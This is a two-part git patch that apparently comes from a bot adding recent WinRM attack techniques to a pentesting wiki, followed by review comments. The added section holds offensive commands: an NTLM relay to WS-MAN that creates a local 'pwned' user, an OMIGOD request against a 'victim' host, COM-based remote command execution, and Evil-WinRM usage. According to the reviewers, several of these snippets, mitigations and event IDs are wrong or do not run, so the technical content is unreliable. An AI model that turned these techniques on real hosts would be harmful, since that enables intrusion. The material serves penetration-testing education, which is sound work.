From 91348afa2246e1dd3a1373b581dbc84c76c30927 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Wed, 13 Aug 2025 01:45:46 +0000 Subject: [PATCH 1/2] Add content from: Research Update: Enhanced src/network-services-pentesting/59... --- .../5985-5986-pentesting-winrm.md | 73 ++++++++++++++++++- src/welcome/hacktricks-values-and-faq.md | 3 +- 2 files changed, 73 insertions(+), 3 deletions(-) diff --git a/src/network-services-pentesting/5985-5986-pentesting-winrm.md b/src/network-services-pentesting/5985-5986-pentesting-winrm.md index b2e36a871..fd7931479 100644 --- a/src/network-services-pentesting/5985-5986-pentesting-winrm.md +++ b/src/network-services-pentesting/5985-5986-pentesting-winrm.md 
@@ -256,8 +256,80 @@ end - `port:5985 Microsoft-HTTPAPI` +--- + +## Recent Vulnerabilities & Offensive Techniques (2021-2025) + +### NTLM relay directly to WinRM (WS-MAN) +Since Impacket 0.11 (May 2023) `ntlmrelayx.py` can relay captured NTLM credentials straight to a **WS-MAN**/WinRM listener. When a host still listens on **unencrypted HTTP (5985)** an attacker can combine *mitm6* (or *Responder*) to coerce authentication and obtain SYSTEM-level code-execution: + +```bash +sudo ntlmrelayx.py -t wsman://10.0.0.25 --no-smb-server -smb2support \ + --command "net user pwned P@ssw0rd! /add" +``` + +Mitigations +* Disable HTTP listeners – `Set-Item WSMan:\localhost\Service\EnableCompatibilityHttpListener -Value false` +* Force HTTPS and enable Extended Protection for Authentication (EPA) on recent Windows versions. + +### OMIGOD – CVE-2021-38647 (Azure OMI) +Azure Linux agents use the **Open Management Infrastructure (OMI)** service which exposes the WinRM/WS-MAN API on ports **5985/5986**. A logic error allowed **unauthenticated RCE as root**: + +```text +curl http://victim:5985/wsman -H 'Content-Type:text/xml' -d '' +``` + +Patch or remove OMI (version ≥ 1.6.8-1) and block those ports from the Internet. + +### WSMan.Automation COM abuse for lateral movement +WinRM can be driven without PowerShell via the `WSMan.Automation` COM object – useful on systems in Constrained-Language mode. Tools such as *SharpWSManWinRM* wrap this technique: + +```powershell +$ws = New-Object -ComObject 'WSMan.Automation' +$session = $ws.CreateSession('http://srv01:5985/wsman',0,$null) +$cmdId = $session.Command('cmd.exe',@('/c','whoami')) +$session.Signal($cmdId,0) +``` + +The execution chain (`svchost → wmiprvse → cmd.exe`) is identical to classic PS-Remoting. 
+ +--- + +## Tooling updates + +* **Evil-WinRM v3.x (2024)** – now supports **Kerberos** (`-k` / `--spn`) and **certificate-based** authentication (`--cert-pem`/`--key-pem`), session logging (`-L`) and the ability to disable remote path completion (`-N`). + + ```bash + RHOST=10.0.0.25 evil-winrm -i $RHOST -u j.doe -k --spn HTTP/$RHOST + ``` + +* **Python – `pypsrp` 0.9 (2024)** offers WinRM & PS-Remoting from Linux, including CredSSP and Kerberos: + + ```python + from psrp.client import Client + c = Client('srv01', username='ACME\\j.doe', ssl=True) + print(c.execute_cmd('ipconfig /all').std_out.decode()) + ``` + +* **Detection** – monitor the **Microsoft-Windows-WinRM/Operational** log: + * Event 91 / 163 – shell created + * Event 182 – authentication failure + * In the Security log event 4262 records the source IP (added July 2022 CUs). + Collect these centrally and alert on anonymous or external IPs. + +--- + +## Shodan + +- `port:5985 Microsoft-HTTPAPI` + ## References +- [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/) +- [https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/](https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/) +- [https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure](https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure) + + - [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/) ## HackTricks Automatic Commands @@ -304,4 +376,3 @@ Entry_2: {{#include ../banners/hacktricks-training.md}} - diff --git a/src/welcome/hacktricks-values-and-faq.md b/src/welcome/hacktricks-values-and-faq.md index a5b53905c..dd6a54063 100644 --- a/src/welcome/hacktricks-values-and-faq.md 
+++ b/src/welcome/hacktricks-values-and-faq.md @@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con > [!TIP] > -> - **How can I cite a page of HackTricks?** +> - **How can I a page of HackTricks?** As long as the link **of** the page(s) where you took the information from appears it's enough.\ If you need a bibtex you can use something like: @@ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the {{#include ../banners/hacktricks-training.md}} - From c64511c1bc87d66b89e06b37d665fd3ba7192abb Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Wed, 13 Aug 2025 17:00:32 +0200 Subject: [PATCH 2/2] Update hacktricks-values-and-faq.md --- src/welcome/hacktricks-values-and-faq.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/welcome/hacktricks-values-and-faq.md b/src/welcome/hacktricks-values-and-faq.md index dd6a54063..bce76c622 100644 --- a/src/welcome/hacktricks-values-and-faq.md +++ b/src/welcome/hacktricks-values-and-faq.md @@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con > [!TIP] > -> - **How can I a page of HackTricks?** +> - **How can I cite a page of HackTricks?** As long as the link **of** the page(s) where you took the information from appears it's enough.\ If you need a bibtex you can use something like:
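Review bot: in the `@@ -256,8 +256,80 @@` hunk of 5985-5986-pentesting-winrm.md the WSMan.Automation snippet cannot run as written: the Session object returned by `CreateSession` exposes Get, Put, Create, Delete, Invoke, Enumerate and Identify, not `Command` or `Signal`, so `$session.Command('cmd.exe',@('/c','whoami'))` fails with a method-not-found error. The bohops post this section cites drives the `.../wsman/1/windows/shell/cmd` resource through `$session.Invoke()` with the Create, Command, Receive and Signal actions and their SOAP bodies; either reproduce that sequence or drop the block. The sentence under it is also wrong: a WinRM cmd shell is hosted by `winrshost.exe` and a PowerShell remoting shell by `wsmprovhost.exe`, both children of the WinRM `svchost.exe`; `wmiprvse.exe` is the WMI provider host and is not in this chain, so the chain is neither `svchost → wmiprvse → cmd.exe` nor identical between the two techniques.

Further points in the same hunk. The relay mitigation `EnableCompatibilityHttpListener` toggles the legacy port-80 listener, not the 5985 listener; removing plaintext WinRM means deleting the HTTP listener (`winrm delete winrm/config/Listener?Address=*+Transport=HTTP`), and EPA for WinRM is configured as `CbtHardeningLevel=Strict` under `winrm/config/service/auth`. A relayed session also runs as the relayed account (with its admin token if it is in Administrators or Remote Management Users), not as SYSTEM, so "SYSTEM-level code-execution" overstates it. The OMIGOD `curl` posts an empty body (`-d ''`) and demonstrates nothing; the Wiz write-up in References describes a WS-Man ExecuteShellCommand request sent without an Authorization header, so either show that request or describe the condition in prose, and note that OMI listens on 1270 as well as 5985/5986. The Evil-WinRM options listed do not exist: Kerberos is `-r REALM` (with `--spn` taking a prefix, default `HTTP`), certificate auth is `-c`/`-k` for public and private key paths, and session logging is `-l`, so `-k --spn HTTP/$RHOST` would be parsed as a private-key path and a bad SPN prefix. pypsrp's import is `from pypsrp.client import Client` and `execute_cmd` returns a `(stdout, stderr, rc)` tuple of strings, so `.std_out.decode()` raises AttributeError; the call also needs a password or a Kerberos ticket. The detection bullet has no source and no Security log event 4262 appears in Microsoft's security auditing event list, so cite documentation for those IDs. Finally, the hunk adds a second `## Shodan` section with the same `port:5985 Microsoft-HTTPAPI` entry already present in the unchanged context above it, plus a second copy of the ropnop URL that is already in References and a stray indented blank reference line; remove the duplicates.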
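Review bot: the `@@ -304,4 +376,3 @@` hunk in 5985-5986-pentesting-winrm.md and the `@@ -144,4 +144,3 @@` hunk in hacktricks-values-and-faq.md only strip the blank line after `{{#include ../banners/hacktricks-training.md}}`; that is whitespace churn unrelated to the subject line, so leave the trailing newline of both files as it was.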
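Review bot: the `@@ -48,7 +48,7 @@` hunk in src/welcome/hacktricks-values-and-faq.md deletes the word "cite" from the FAQ question, leaving `> - **How can I a page of HackTricks?**`, and has nothing to do with the WinRM content in the subject line; drop this hunk from PATCH 1/2 rather than fixing it in a follow-up.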
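Review bot: PATCH 2/2 exists only to restore the "cite" that PATCH 1/2 removed in the same `@@ -48,7 +48,7 @@` hunk; squash the two so the FAQ file is not touched by this series at all.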